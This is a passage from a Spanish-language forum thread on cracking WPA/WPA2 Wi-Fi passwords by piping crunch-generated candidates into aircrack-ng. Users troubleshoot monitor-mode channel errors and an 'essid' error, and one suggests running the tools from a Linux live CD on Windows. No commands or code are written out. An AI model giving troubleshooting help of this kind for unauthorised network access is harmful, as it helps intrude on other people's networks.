20:18:44  Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch


Siento ser pesado, ¿alguna idea?

Gracias otra vez y un saludo. 8)
Título: Re:Romper WPA y WPA2 con crunch.
Publicado por: noopynoob en Diciembre 29, 2013, 10:20:32 pm
creo que no especificaste un canal, intenta con wlan0 en vez de mon0

porque no copias todo el procidimiento completo de la terminal y miramos que esta pasando, o toma una captura de todo el procedimiento porque debe haber algo mal.
Título: Re:Romper WPA y WPA2 con crunch.
Publicado por: mcjeikk en Febrero 23, 2014, 06:25:03 am
Hola amigo,

tengo un problema con el ultimo paso, 

cuando le envio parametros al crunch para generar la contraseña el aircrack me dice que mi essid no existe.
"check your essid"
y luego  para.

me podrias ayudar con esto porfavor
Título: Re:Romper WPA y WPA2 con crunch.
Publicado por: King of the Trojan en Febrero 23, 2014, 12:17:14 pm
Valla muchísimas gracias ya no tendré que hacer diccionarios!!
Y yo que pensaba que crunch no servia para nada...
Título: Re:Romper WPA y WPA2 con crunch.
Publicado por: maaai en Febrero 25, 2014, 03:49:41 pm
Hola que mas amigo esta muy buen a la información, pero por casualidad no sabes de algun programa que haga lo mismo pero en Güindos   ;)
Título: Re:Romper WPA y WPA2 con crunch.
Publicado por: King of the Trojan en Febrero 25, 2014, 04:13:53 pm
Hola que mas amigo esta muy buen a la información, pero por casualidad no sabes de algun programa que haga lo mismo pero en Güindos   ;)
Si quieres puedes usar el crunch desde un live cd de linux o instalar linux en una maquina virtual.
Creo recordar que aircrack también esta para win.